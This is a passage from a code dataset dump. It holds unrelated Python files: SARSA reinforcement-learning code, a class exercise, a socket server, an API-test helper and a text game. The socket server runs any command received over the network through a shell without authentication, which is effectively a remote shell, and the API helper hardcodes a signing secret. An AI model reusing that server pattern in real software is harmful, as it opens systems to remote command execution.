net_util\nfrom slm_lab.lib import logger, util\nfrom slm_lab.lib.decorator import lab_api\nfrom torch.autograd import Variable\nimport numpy as np\nimport pydash as _\nimport sys\nimport torch\n\n\nclass SARSA(Algorithm):\n '''Implementation of SARSA.\n\n Algorithm:\n Repeat:\n 1. Collect some examples by acting in the environment and store them in an on policy replay memory (either batch or episodic)\n 2. For each example calculate the target (bootstrapped estimate of the discounted value of the state and action taken), y, using a neural network to approximate the Q function. s_t' is the next state following the action actually taken, a_t. a_t' is the action actually taken in the next state s_t'.\n y_t = r_t + gamma * Q(s_t', a_t')\n 4. For each example calculate the current estimate of the discounted value of the state and action taken\n x_t = Q(s_t, a_t)\n 5. Calculate L(x, y) where L is a regression loss (eg. mse)\n 6. Calculate the gradient of L with respect to all the parameters in the network and update the network parameters using the gradient\n '''\n\n def __init__(self, agent):\n '''\n After initialization SARSA has an attribute self.agent which contains a reference to the entire Agent acting in the environment.\n Agent components:\n - algorithm (with a net: neural network function approximator, and a policy: how to act in the environment). One algorithm per agent, shared across all bodies of the agent\n - memory (one per body)\n '''\n super(SARSA, self).__init__(agent)\n\n @lab_api\n def post_body_init(self):\n '''Initializes the part of algorithm needing a body to exist first. A body is a part of an Agent. Agents may have 1 to k bodies. Bodies do the acting in environments, and contain:\n - Memory (holding experiences obtained by acting in the environment)\n - State and action dimensions for an environment\n - Boolean var for if the action space is discrete\n '''\n self.init_nets()\n self.init_algo_params()\n logger.info(util.self_desc(self))\n\n def init_nets(self):\n '''Initialize the neural network used to learn the Q function from the spec'''\n body = self.agent.nanflat_body_a[0] # single-body algo\n self.state_dim = body.state_dim # dimension of the environment state, e.g. 4\n self.action_dim = body.action_dim # dimension of the environment actions, e.g. 2\n net_spec = self.agent.spec['net']\n mem_spec = self.agent.spec['memory']\n net_kwargs = util.compact_dict(dict(\n hid_layers_activation=_.get(net_spec, 'hid_layers_activation'),\n optim_param=_.get(net_spec, 'optim'),\n loss_param=_.get(net_spec, 'loss'),\n clamp_grad=_.get(net_spec, 'clamp_grad'),\n clamp_grad_val=_.get(net_spec, 'clamp_grad_val'),\n gpu=_.get(net_spec, 'gpu'),\n ))\n if net_spec['type'].find('Recurrent') != -1:\n self.net = getattr(net, net_spec['type'])(\n self.state_dim, net_spec['hid_layers'], self.action_dim, mem_spec['length_history'], **net_kwargs)\n else:\n self.net = getattr(net, net_spec['type'])(\n self.state_dim, net_spec['hid_layers'], self.action_dim, **net_kwargs)\n self.set_net_attributes()\n\n def set_net_attributes(self):\n '''Initializes additional parameters from the net spec. Called by init_nets'''\n net_spec = self.agent.spec['net']\n util.set_attr(self, _.pick(net_spec, [\n 'decay_lr', 'decay_lr_frequency', 'decay_lr_min_timestep', 'gpu'\n ]))\n if not hasattr(self, 'gpu'):\n self.gpu = False\n logger.info(f'Training on gpu: {self.gpu}')\n\n def init_algo_params(self):\n '''Initialize other algorithm parameters.'''\n algorithm_spec = self.agent.spec['algorithm']\n net_spec = self.agent.spec['net']\n self.action_policy = act_fns[algorithm_spec['action_policy']]\n self.action_policy_update = act_update_fns[algorithm_spec['action_policy_update']]\n self.set_other_algo_attributes()\n self.nanflat_explore_var_a = [\n self.explore_var_start] * self.agent.body_num\n\n def set_other_algo_attributes(self):\n '''Initializes additional parameters from the algorithm spec. Called by init_algo_params'''\n algorithm_spec = self.agent.spec['algorithm']\n util.set_attr(self, _.pick(algorithm_spec, [\n # explore_var is epsilon, tau or etc. depending on the action policy\n # these control the trade off between exploration and exploitaton\n 'explore_var_start', 'explore_var_end', 'explore_anneal_epi',\n 'gamma', # the discount factor\n 'training_frequency', # how often to train for batch training (once each training_frequency time steps)\n 'num_epis_to_collect', # how many episodes to collect before training for episodic training\n ]))\n self.to_train = 0\n self.set_memory_flag()\n\n def set_memory_flag(self):\n '''Flags if memory is episodic or discrete. This affects how self.sample() handles the batch it gets back from memory'''\n body = self.agent.nanflat_body_a[0]\n memory = body.memory.__class__.__name__\n if (memory.find('OnPolicyReplay') != -1) or (memory.find('OnPolicyNStepReplay') != -1):\n self.is_episodic = True\n elif (memory.find('OnPolicyBatchReplay') != -1) or (memory.find('OnPolicyNStepBatchReplay') != -1):\n self.is_episodic = False\n else:\n logger.warn(f'Error: Memory {memory} not recognized')\n raise NotImplementedError\n\n def compute_q_target_values(self, batch):\n '''Computes the target Q values for a batch of experiences'''\n # Calculate the Q values of the current and next states\n q_sts = self.net.wrap_eval(batch['states'])\n q_next_st = self.net.wrap_eval(batch['next_states'])\n q_next_actions = batch['next_actions']\n logger.debug2(f'Q next states: {q_next_st.size()}')\n # Get the q value for the next action that was actually taken\n idx = torch.from_numpy(np.array(list(range(q_next_st.size(0)))))\n if torch.cuda.is_available() and self.gpu:\n idx = idx.cuda()\n q_next_st_vals = q_next_st[idx, q_next_actions.squeeze_(1).data.long()]\n # Expand the dims so that q_next_st_vals can be broadcast\n q_next_st_vals.unsqueeze_(1)\n logger.debug2(f'Q next_states vals {q_next_st_vals.size()}')\n logger.debug3(f'Q next_states {q_next_st}')\n logger.debug3(f'Q next actions {q_next_actions}')\n logger.debug3(f'Q next_states vals {q_next_st_vals}')\n logger.debug3(f'Dones {batch[\"dones\"]}')\n # Compute q_targets using reward and Q value corresponding to the action taken in the next state if there is one. Make next state Q value 0 if the current state is done\n q_targets_actual = batch['rewards'].data + self.gamma * \\\n torch.mul((1 - batch['dones'].data), q_next_st_vals)\n logger.debug2(f'Q targets actual: {q_targets_actual.size()}')\n logger.debug3(f'Q states {q_sts}')\n logger.debug3(f'Q targets actual: {q_targets_actual}')\n # We only want to train the network for the action selected in the current state\n # For all other actions we set the q_target = q_sts so that the loss for these actions is 0\n q_targets = torch.mul(q_targets_actual, batch['actions_onehot'].data) + \\\n torch.mul(q_sts, (1 - batch['actions_onehot'].data))\n logger.debug2(f'Q targets: {q_targets.size()}')\n logger.debug3(f'Q targets: {q_targets}')\n return q_targets\n\n def sample(self):\n '''Samples a batch from memory'''\n batches = [body.memory.sample()\n for body in self.agent.nanflat_body_a]\n batch = util.concat_dict(batches)\n if self.is_episodic:\n util.to_torch_nested_batch(batch, self.gpu)\n # Add next action to batch\n batch['actions_onehot'] = []\n batch['next_actions'] = []\n for acts in batch['actions']:\n # The next actions are the actions shifted by one time step\n # For episodic training is does not matter that the action in the last state is set to zero since there is no corresponding next state. The Q target is just the reward received in the terminal state.\n next_acts = torch.zeros_like(acts)\n next_acts[:-1] = acts[1:]\n # Convert actions to one hot (both representations are needed for SARSA)\n acts_onehot = util.convert_to_one_hot(acts, self.action_dim, self.gpu)\n batch['actions_onehot'].append(acts_onehot)\n batch['next_actions'].append(next_acts)\n # Flatten the batch to train all at once\n batch = util.concat_episodes(batch)\n else:\n util.to_torch_batch(batch, self.gpu)\n # Batch only useful to train with if it has more than one element\n # Train function checks for this and skips training if batch is too small\n if batch['states'].size(0) > 1:\n batch['next_actions'] = torch.zeros_like(batch['actions'])\n batch['next_actions'][:-1] = batch['actions'][1:]\n batch['actions_onehot'] = util.convert_to_one_hot(batch['actions'], self.action_dim, self.gpu)\n batch_elems = ['states', 'actions', 'actions_onehot', 'rewards', 'dones', 'next_states', 'next_actions']\n for k in batch_elems:\n if batch[k].dim() == 1:\n batch[k].unsqueeze_(1)\n # If the last experience in the batch is not terminal the batch has to be shortened by one element since the algorithm does not yet have access to the next action taken for the final experience\n if batch['dones'].data[-1].int().eq_(0).cpu().numpy()[0]:\n logger.debug(f'Popping last element')\n for k in batch_elems:\n batch[k] = batch[k][:-1]\n return batch\n\n @lab_api\n def train(self):\n '''Completes one training step for the agent if it is time to train.\n Otherwise this function does nothing.\n '''\n t = util.s_get(self, 'aeb_space.clock').get('total_t')\n if self.to_train == 1:\n logger.debug3(f'Training at t: {t}')\n batch = self.sample()\n if batch['states'].size(0) < 2:\n logger.info(f'Batch too small to train with, skipping...')\n self.to_train = 0\n return np.nan\n q_targets = self.compute_q_target_values(batch)\n if torch.cuda.is_available() and self.gpu:\n q_targets = q_targets.cuda()\n y = Variable(q_targets)\n loss = self.net.training_step(batch['states'], y)\n logger.debug(f'loss {loss.data[0]}')\n self.to_train = 0\n return loss.data[0]\n else:\n logger.debug3('NOT training')\n return np.nan\n\n @lab_api\n def body_act_discrete(self, body, state):\n ''' Selects and returns a discrete action for body using the action policy'''\n return self.action_policy(body, state, self.net, self.nanflat_explore_var_a[body.nanflat_a_idx], self.gpu)\n\n def update_explore_var(self):\n '''Updates the explore variables'''\n space_clock = util.s_get(self, 'aeb_space.clock')\n nanflat_explore_var_a = self.action_policy_update(self, space_clock)\n explore_var_a = self.nanflat_to_data_a(\n 'explore_var', nanflat_explore_var_a)\n return explore_var_a\n\n def update_learning_rate(self):\n decay_learning_rate(self, [self.net])\n\n @lab_api\n def update(self):\n '''Update the agent after training'''\n self.update_learning_rate()\n return self.update_explore_var()\n","sub_path":"slm_lab/agent/algorithm/sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"28283625","text":"import mymodule\nclass Person:\n def __init__(self, n: str, a: int):\n self.name = n\n self.__age = a\n\n @property\n def age(self):\n return self.__age\n\n @age.setter\n def age(self, v):\n self.__age = v\n\n def __str__(self):\n return (f'{self.name},{self.__age}')\n\n def __repr__(self):\n return (f'group-{self.name},{self.__age}')\n\n\n\nvova1 = Person('Serko Vladimir', 30)\nvova2 = Person('Volk Vladimir', 25)\nmisha1 = Person('Strock Misha', 41)\nprint(vova1.age)\ngroup = [vova1, vova2, misha1]\nprint(group)\ngroup = sorted(group, key=lambda x: x.age)\nfor el in group:\n print(el)\nprint(mymodule.kor(group[0].age))\n\nclass Potok(Person):\n def sum_age(self, p):\n sum = 0\n for el in p:\n sum += el.age\n return sum\n\npotok1 = Potok('группа', 4545)\npotok2 = Potok('группа22', 66)\npotoki = [potok1, potok2]\nprint(potoki)\nprint(potok1.sum_age(potoki))","sub_path":"Domashka_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"368840469","text":"# _*_ coding: utf-8 _*_\nimport socket\nimport subprocess\nimport struct\nimport json\nphone = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #买手机\nphone.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\nphone.bind(('127.0.0.1',8080)) #绑定手机卡\nphone.listen(5) #阻塞的最大数\nprint('start runing.....')\nwhile True: #链接循环\n coon,addr = phone.accept()# 等待接电话\n print(coon,addr)\n\n while True: #通信循环\n # 收发消息\n cmd = coon.recv(1024) #接收的最大数\n print('接收的是:%s'%cmd.decode('utf-8'))\n\n #处理过程\n res = subprocess.Popen(cmd.decode('utf-8'),\n shell = True,\n stdout=subprocess.PIPE, #标准输出\n stderr=subprocess.PIPE #标准错误\n )\n stdout = res.stdout.read()\n stderr = res.stderr.read()\n\n # 制作报头\n header_dic = {\n 'total_size': len(stdout)+len(stderr), # 总共的大小\n 'filename': None,\n 'md5': None\n }\n\n header_json = json.dumps(header_dic) #字符串类型\n header_bytes = header_json.encode('utf-8') #转成bytes类型(但是长度是可变的)\n\n #先发报头的长度\n coon.send(struct.pack('i', len(header_bytes))) #发送固定长度的报头\n\n #再发报头\n coon.send(header_bytes)\n\n #最后发命令的结果\n coon.send(stdout)\n coon.send(stderr)\n coon.close()\nphone.close()","sub_path":"Demo/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"648156448","text":"# coding = utf-8\nimport requests\nfrom natsort import natsorted\nimport hashlib\nimport os\nimport logging\nimport json\nimport configparser as cparser\n\nfrom log import logger\n\n\n# ======== Reading db_config.ini setting ===========\n\n\nclass DefTool:\n def url(self, patch):\n base_dir = str(os.path.dirname(os.path.dirname(__file__)))\n base_dir = base_dir.replace('\\\\', '/')\n file_path = base_dir + \"/url.ini\"\n cf = cparser.ConfigParser()\n cf.read(file_path)\n baseUrl = cf.get(\"urlTestconf\", \"url_test\")\n # baseUrl = cf.get(\"urlPreconf\", \"url_pre\")\n # baseUrl = cf.get(\"urlProconf\", \"url_pro\")\n url = baseUrl + patch\n return url\n\n def payload(self, **params):\n sortedList = []\n for key in params:\n try:\n sortedParms = str(key) + str(params[key])\n sortedList.append(sortedParms)\n except Exception as e:\n print(e)\n sort = natsorted(sortedList)\n argument = \"a8235488a6aae009ff7e32430fee2f44\"\n keysorted = argument + (\"\".join(sort))\n md = hashlib.md5()\n md.update(keysorted.encode(encoding='utf-8'))\n sign_old = md.hexdigest()\n sign = {\"sign\": sign_old}\n payload = dict(params, **sign)\n return payload\n\n def headers(self, token):\n header = {\"token\": token}\n return header\n\n\nclass RunMain:\n \"\"\"\"封装各类请求:get,post,put,deleter,options,head\"\"\"\n def __init__(self, method, url, params=None, header=None, params_json=None):\n self.re = self.http_request(method, url, params, header, params_json).json()\n def http_request(self, method, url, params=None, header=None, params_json=None):\n result = None\n if method == \"get\":\n try:\n result = requests.get(url=url, params=params, headers=header, json=params_json)\n logging.info(\"action get\")\n except Exception as e:\n logging.error(\"请求失败,→url→{}→参数→{}→header→{}\".format(url, params, header))\n else:\n try:\n result = requests.post(url=url, data=params, headers=header, json=params_json)\n logging.info(\"action post\")\n except Exception as e:\n logging.error(\"请求失败,→url→{}→参数→{}→header→{}\".format(url, params, header))\n # return json.dumps(result.json(), indent=2, sort_keys=False, ensure_ascii=False)\n return result\n\n\nif __name__ == \"__main__\":\n new_url = DefTool()\n url = new_url.url('/app/loan/getHomeProductListV3.do')\n print(url)\n test = RunMain(\"get\", url).re\n print(test)\n","sub_path":"Global_base/global_base.py","file_name":"global_base.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"160473133","text":"#HEADER\n#Created by: Scott Russell\n#Practicing my python (Small game example)\n\n#Time, os, and sys used for typewriter printing\nimport time,os,sys\n#random Seed imports\nfrom random import seed\nfrom random import randint\nimport random\n\n#Typewriter printing\ndef printo(text):\n\tfor character in text:\n\t\tsys.stdout.write(character)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.00)\n\tprint(\"\")\n\treturn\n\n#Typewriter printing for input line\ndef printi(text):\n\tfor character in text:\n\t\tsys.stdout.write(character)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.00) \n\tvalue = input() \n\treturn value \n\n#Clear screen \ndef clear_screen():\n os.system(\"cls\")\n\n#Initial screen display\ndef intro():\n\tprinto (\"---INTRO---\")\n\tprinto (\"Welcome to Scott's Game\\n\")\n\treturn 0\n \n#Selecting a class name\ndef character_name():\n\twhile 1:\n\t\tprinto(\"---NAME SELECTION SCREEN---\")\n\t\t#pick a name\n\t\t\n\t\tname = str(printi(\"Please Enter a Character Name: \"))\n\t\tconfirm = printi(\"Are you sure you want to be named: [\"+name+\"] (y/n): \")\n\t\t\n\t\tif str(confirm) == \"y\" or str(confirm) == \"Y\":\n\t\t\tclear_screen()\n\t\t\treturn name\n\t\telif str(confirm) == \"n\" or str(confirm) == \"N\":\n\t\t\tprinto(\"You may choose another name!\")\n\t\telse:\n\t\t\tprinto(\"Invalid input. Let's try again.\")\n\t\t\t\n#Contains list of player classes, and provides input for selection\ndef class_selection(name):\n\t#IMPORTANT: To change the # of character classes simply chang the class_count variable\n\t# You must also add/remove a line from the class Defintions array below. That's it!\n\tclass_count = 3\n\t\n\t#Define a 2D Array to contain all the information needed for classes\n\trows, cols = (class_count, 11)\n\tarray = [[0]*cols]*rows\t\n\t\n\t#Class Definitions\n\t#\t\t Name, Role,\t Base-HP,\tMax-HP, Weapon Name,\tWeapon-L, Weapon-H, Weapon Crit%,\tStrength, Dexterity, Constitution,\tLevel\tFirst Strike\tRestoration\tProtection\n\tarray[0] = [name,\"Soldier\", 20,\t\t 20,\t \"Broken Sword\", 1,\t\t \t4,\t\t \t10,\t\t\t \t5,\t\t \t5,\t\t \t5,\t\t\t\t1,\t\t0,\t\t\t\t2,\t\t\t\t\t0]\n\tarray[0].append(\"A strong and well balanced warrior, the soldier is able to restore health between fights.\")\n\t\n\tarray[1] = [name,\"Rogue\", 20,\t\t 20,\t \"Rusty Dagger\", 1,\t\t \t4,\t\t \t30,\t\t\t \t5,\t\t \t5,\t\t \t5,\t\t\t\t1,\t\t1,\t\t\t\t0,\t\t\t\t\t0]\n\tarray[1].append(\"The stealthy Rogue has an innate ability to always attack first.\")\n\t\n\tarray[2] = [name,\"Bulwark\", 20,\t\t 20,\t \"Dull Axe\",\t 1,\t\t \t4,\t\t \t0,\t\t\t \t5,\t\t \t5,\t\t \t5,\t\t\t\t1,\t\t0,\t\t\t\t0,\t\t\t\t\t1]\t\n\tarray[2].append(\"With heavy armor the bulwark is protected against a portion of all attacks.\")\n\n\t#For each Class assign statistics and display basic information\n\tfor i in range(class_count):\n\t\tarray[i] = set_stats(array[i])\n \n\t#Loop until a class is chosen\n\twhile 1: \n\t\tclear_screen()\n\t\tprinto(\"\\n---CLASS SELECTION SCREEN---\")\n\t\t#Display the names of each class for input\n\t\tfor i in range(class_count):\n\t\t\tprinto(\"[\"+str(i+1)+\"]=[\"+array[i].role +\"]\\n\"+array[i].description+\"\\n\")\n\t\t#Using a try except to catch invalid input from user\n\t\ttry:\n\t\t\tchoice =int(printi(\"Select a class for in depth statistics: \"))\n\t\t\tif choice <= class_count and choice >0:\n\t\t\t\tdisplay_stats(array[choice-1])\n\t\t\t\tchoice2 = printi(\"[1] - Confirm selection of class: [\"+str(array[choice-1].role)+\"]\\n[2] - Return to List of Classes\\n-->:\")\n\t\t\t\tif str(choice2) != \"1\":\n\t\t\t\t\tcontinue\n\t\t\t\tclear_screen()\n\t\t\t\treturn array[choice-1]\n\t\t\telse:\n\t\t\t\tprinto(\"Invalid Input!\\n\")\n\t\t\t\tos.system(\"pause\")\n\t\t\t\tcontinue\n\t\texcept ValueError as e:\n\t\t\tprinto( \"Invalid Input!\\n\")\n\t\t\tos.system(\"pause\")\n\t\t\tcontinue\n\t\n\t#This line should not be reachable\n\treturn 0\n\t\n#Displays in depth information for any character sent to this function.\ndef display_stats(character):\n\tclear_screen()\n\tprinto(\"---DETAILED-STATISTICS---\")\n\tprinto (\"\\nName: [\" + character.name+\"]\")\n\tprinto (\"Level: [\"+str(character.level)+\"] Experience: [\"+str(character.experience)+\"/\"+str(character.experience_to_level[character.level])+\"]\")\n\tprinto (\"Role: [\" + (character.role)+\"]\")\n\tprinto(\"Health: [\"+str(character.health[0]) +\"/\"+str(character.health[1])+\"]\")\n\tprinto(\"Weapon: [\"+str(character.weapon) +\"] ( Base Crit: [\"+str(character.weaponC)+\"%] )\")\n\tprinto(\"Base Damage: [\"+str(character.weaponD[0])+\"-\"+str(character.weaponD[1])+\"]\")\n\tprinto(\"Bonus Damage: [\"+str(character.strength_bonus)+\"]\")\n\tprinto(\"Critical Strike Chance: [\"+str(character.critical)+\"%]\")\n\tprinto(\"Strength: [\"+str(character.strength) +\"] provides a bonus of: [\"+str(character.strength_bonus)+\"] to damage.\")\n\tprinto(\"Dexterity: [\"+str(character.dexterity) + \"] provides a bonus of: [\"+str(character.dexterity_bonus)+ \"%] to Critical Strike Chance.\")\n\tprinto(\"Constitution: [\"+str(character.constitution) + \"] provides a bonus of: [\"+str(character.constitution_bonus) +\"] to health.\")\n\tif character.first_strike == 1:\n\t\tprinto(\"Special: [First Strike] in every combat\")\n\tif character.restoration > 0:\n\t\tprinto(\"Special: This character restores [\"+str(character.restoration)+\"] health after each battle\")\n\tif character.protection > 0:\n\t\tprinto(\"Special: Heavy Armor protects against [\"+str(character.protection)+\"] damage each combat\")\n\t\n\tif character.tower_level > 0:\n\t\tprinto(\"Tower Level: [\"+str(character.tower_level)+\"]\")\n\tprinto(\"\\n\")\n\treturn 0\n \n #Assigns Statistics to character or enemies based on 11 input fields data[0] - data[10]\ndef set_stats(data):\n\tclass Character:\n\t\t#Character Name\n\t\tname = data[0]\n\t\t#Character role\n\t\trole = data[1]\n\t\t#Current/Max\n\t\tbase_health = data[2],data[3]\n\t\t#Weapon Name\n\t\tweapon = data[4]\n\t\t#Damage has a low and high end\n\t\tweaponD = [data[5],data[6]]\n\t\t#Weapon Critical Strike Chance\n\t\tweaponC = data[7]\n\t\t\n\t\t#Strength of character --> Damage Bonus\n\t\tstrength = data[8]\n\t\tstrength_bonus = int(strength-5)\n\t\t\n\t\t#Dexterity of character --> Critical Strike Bonus\n\t\tdexterity = data[9]\n\t\tdexterity_bonus = int(dexterity-5)*10\n \n\t\t#Constitution of Character --> Increased Health\n\t\tconstitution = data[10]\n\t\tconstitution_bonus = int(constitution-5)\n\t\tlevel = data[11]\n\t\t\n\t\t#First strike players always attack first\n\t\tfirst_strike = data[12]\n\t\trestoration = data[13]\n\t\tprotection = data[14]\n\t\tdescription = data[15]\n\t\tis_player = True\n\t\ttower_level = 0\n\t\t\n\t\t#player starts with 0 experiencre\n\t\texperience = 0\n\t\t\n\t\t#break points for experience to level up\n\t\texperience_to_level = [0,5,10,15,20,25,30]\n\t\t#Apply Attributes bonuses to damage, health, and critical strike chance\n\t\tdamage = [weaponD[0]+strength_bonus,weaponD[1]+strength_bonus]\n\t\t#Prevents damage from being lower than 0\n\t\tif weaponD[0] < 0:\n\t\t\tweaponD[0] = 0\n\t\t\n\t\thealth = [base_health[0]+constitution_bonus,base_health[1]+constitution_bonus]\n\t\tcritical = weaponC + dexterity_bonus\n\t\t#Prevent critical strike chance from being lower than 0%\n\t\tif (critical < 0):\n\t\t\tcritical = 0\n\t#Assign a player object to the class, and return\n\tPlayer = Character() \n\treturn Player\n\n#select between Story Mode or Tower Mode\ndef gameplay_selection(): \n\twhile 1:\n\t\tprinto(\"---CHOOSE A GAMEPLAY MODE---\")\n\t\ttry:\n\t\t\tchoice = int(printi(\"[1] - Tower Mode \\n[2] - Story Mode\\n-->:\"))\n\t\t\tif choice == 1 or choice == 2:\n\t\t\t\treturn choice\n\t\t\telse:\n\t\t\t\tprinto(\"Invalid Input\\n\")\n\t\texcept ValueError as e:\n\t\t\tprinto( \"Invalid Input!\\n\")\n\t\t\tcontinue\n\treturn 0\n\n#Tower mode, fight waves of enemies until you die\ndef tower_mode(Player):\n\tclear_screen()\n\tprinto(\"---WELCOME TO TOWER MODE---\")\n\tprinto(\"In this mode, you will climb the tower.\")\n\tprinto(\"As you ascend, you will face stronger enemies\")\n\tprinto(\"How far can you go? good luck!\\n\")\n\tos.system('pause')\n\t\n\tPlayer.tower_level = 1\n\t\n\twhile 1:\n\t\t#Select an enemy based on tower level\n\t\tEnemy = enemy_selection(Player.tower_level) \n\n\n\t\t#Displays information about the character\n\t\t#display_stats(Player)\n\t\tclear_screen()\n\t\tprinto(\"---Tower Level: [\"+str(Player.tower_level)+\"]---\")\n\t\tcombat_stats(Enemy)\n\n\t\tcombat_stats(Player)\n\t\t\n\t\tos.system('pause')\n\t\t\n\t\t#perform combat\n\t\tattack_order(Player,Enemy)\n\t\t\n\t\t#After combat is over, End of combat actions take place\n\t\tcombat_end(Player,Enemy)\n\t\t\n\t\t#If Tower Level = 10 the player wins\n\t\tif Player.tower_level == 10:\n\t\t\tvictory_screen(Player)\n\t\t\t\n\t\t#increase tower level following each victory\n\t\tPlayer.tower_level += 1\n\treturn 0\n \n#Starting point for the game (Not implemented yet)\ndef story_mode(Player):\n\tprinto(\"Story Mode not implemented yet, goodbye\")\n\treturn 0\n\n#Enemy Selection for Tower Mode combat (Currently completely random no monster tiers)\ndef enemy_selection(Tower_Level):\n \n\t#Obtain a list of potential enemies\n\tif (Tower_Level < 5):\n\t\tenemy_stats = tier_one()\t\n\telif (Tower_Level < 10):\n\t\tenemy_stats = tier_two()\n\telse:\n\t\tenemy_stats = tier_three()\n\t#Code for randomly selecting an enemy based on time seed\n\tenemy_count = len(enemy_stats)\n \n\t#Select a random enemy based on how many are available\n\trandom_value = randint(0,enemy_count-1)\n\t\n\treturn enemy_stats[random_value]\n\n#Tier 1 Biome: Forest\ndef tier_one():\n\tenemy_count = 5\n\trows, cols = (enemy_count, 11)\n\tenemy_list = [[0]*cols]*rows \n\t\n\t\t#\t\t\tName,\t\t\t \tRole,\t\t Base-HP,\tMax-HP,\tWeapon,\t\t Weapon-L, Weapon-H, \tWeapon Crit% Strength Dexterity Constitution\tLevel\n\tenemy_list[0] = [\"Deer\",\t\t\t\"Beast\", \t\t3,\t\t 3,\t\"Hoof\",\t\t\t2,\t\t 3,\t\t20,\t\t\t \t4,\t \t4,\t\t\t6,\t\t\t\t1]\n\tenemy_list[1] = [\"Eagle\",\t\t \t\"Beast\",\t \t3,\t\t 3,\t\"Talon\",\t\t2,\t\t 3,\t\t20,\t\t\t \t6,\t\t6,\t\t\t3,\t\t\t\t1]\n\tenemy_list[2] = [\"Red Wolf\",\t\t\"Beast\", \t\t3,\t\t 3,\t\"Fangs\",\t\t2,\t\t 3,\t\t20,\t\t\t \t5,\t \t5,\t\t\t5,\t\t\t\t1]\n\tenemy_list[3] = [\"Boar\", \t\t\t\"Beast\",\t \t3,\t\t 3,\t\"Tusks\",\t\t2,\t\t 3,\t\t20,\t\t\t \t4,\t \t5,\t\t\t7,\t\t\t\t1]\n\tenemy_list[4] = [\"Rabbit\",\t\t\t\"Beast\",\t\t3,\t\t 3,\t\"Teeth\",\t\t2,\t\t 3,\t\t20,\t\t\t \t5,\t \t7,\t\t\t3,\t\t\t\t1]\n\tenemy_stats = [0]*rows \n\t#apply stats for all enemies created dynamically\n\tfor i in range(enemy_count):\n\t\tenemy_stats[i] = set_enemy(enemy_list[i])\n\treturn enemy_stats\n\ndef tier_two():\n\tenemy_count = 5\n\trows, cols = (enemy_count, 11)\n\tenemy_list = [[0]*cols]*rows \n\t\n\t\t#\t\t\tName,\t\t\t \tRole,\t\t \tBase-HP,\tMax-HP,\t \tWeapon,\t\t Weapon-L, Weapon-H, Weapon Crit% Strength Dexterity Constitution Level\n\tenemy_list[0] = [\"Gate Guard\",\t\t\"Human\",\t\t5,\t\t \t5,\t\t \t\"Rusty Sword\",\t3,\t\t 5,\t\t20,\t\t\t \t8,\t \t5,\t\t \t7,\t\t2]\n\tenemy_list[1] = [\"Archer\",\t\t \t\"Human\",\t \t5,\t\t \t5,\t\t \t\"Longbow\", \t\t3,\t\t 5,\t\t20,\t\t\t \t4,\t \t12,\t\t \t4,\t\t2]\n\tenemy_list[2] = [\"Pikeman\",\t\t\t\"Human\", \t\t5,\t\t \t5,\t\t \t\"Pike\",\t\t \t3,\t\t 5,\t\t20,\t\t\t \t5,\t \t5,\t\t \t5,\t\t2]\n\tenemy_list[3] = [\"Templar\", \t\t\"Human\",\t \t5,\t\t \t5,\t\t \t\"Mace\",\t\t\t3,\t\t 5,\t\t20,\t\t\t \t6,\t \t6,\t\t\t8,\t\t2]\n\tenemy_list[4] = [\"King's Guard\",\t\"Human\",\t\t5,\t\t \t5,\t\t \t\"Claymore\",\t\t3,\t\t 5,\t\t20,\t\t\t \t10,\t \t5,\t\t \t5,\t\t2]\n\tenemy_stats = [0]*rows \n\t#apply stats for all enemies created dynamically\n\tfor i in range(enemy_count):\n\t\tenemy_stats[i] = set_enemy(enemy_list[i])\n\treturn enemy_stats\n\ndef tier_three():\n\tenemy_count = 1\n\trows, cols = (enemy_count, 11)\n\tenemy_list = [[0]*cols]*rows \n\t\n\t\t#\t\t\tName,\t\t\t \t\t\tRole,\t\t \tBase-HP,\tMax-HP,\t \tWeapon,\t\t Weapon-L, Weapon-H,\t Weapon Crit% Strength Dexterity Constitution Level\n\tenemy_list[0] = [\"The Black Knight\",\t\t\"Demon\",\t\t10,\t\t \t10,\t\t \t\"Halburk\",\t\t3,\t\t 6,\t\t\t 20,\t\t\t 10,\t 10,\t\t \t10,\t\t\t3]\n\n\tenemy_stats = [0]*rows \n\t#apply stats for all enemies created dynamically\n\tfor i in range(enemy_count):\n\t\tenemy_stats[i] = set_enemy(enemy_list[i])\n\treturn enemy_stats\n\n#Sets the enemies Stats based on the tier\ndef set_enemy(data):\n\tclass Character:\n\t\t#Character Name\n\t\tname = data[0]\n\t\t#Character role\n\t\trole = data[1]\n\t\t#Current/Max\n\t\tbase_health = [data[2],data[3]]\n\t\t#Weapon Name\n\t\tweapon = data[4]\n\t\t#Damage has a low and high end\n\t\tweaponD = [data[5],data[6]]\n\t\t#Weapon Critical Strike Chance\n\t\tweaponC = data[7]\n\t\t\n\t\t#Strength of character --> Damage Bonus\n\t\tstrength = data[8]\n\t\tstrength_bonus = int(strength-5)\n\t\t\n\t\t#Dexterity of character --> Critical Strike Bonus\n\t\tdexterity = data[9]\n\t\tdexterity_bonus = int(dexterity-5)*10\n \n\t\t#Constitution of Character --> Increased Health\n\t\tconstitution = data[10]\n\t\tconstitution_bonus = int(constitution-5)\n\t\tlevel = data[11]\n\t\t\n\t\t#Enemies are not the player\n\t\tis_player = False\n\t\t\n\t\t#Enemies have no innate protection\n\t\tprotection = 0\n\t\t#Apply Attributes bonuses to damage, health, and critical strike chance\n\t\tdamage = [weaponD[0]+strength_bonus,weaponD[1]+strength_bonus]\n\t\t#Prevents damage from being lower than 0\n\t\tif weaponD[0] < 0:\n\t\t\tweaponD[0] = 0\n\t\t\n\t\thealth = [base_health[0]+constitution_bonus,base_health[1]+constitution_bonus]\n\t\tcritical = weaponC + dexterity_bonus\n\t\t#Prevent critical strike chance from being lower than 0%\n\t\tif (critical < 0):\n\t\t\tcritical = 0\n\t#Assign a player object to the class, and return\n\tPlayer = Character() \n\treturn Player\n\n#Displays basic infomration about a character (Used in Tower mode for enemies)\ndef 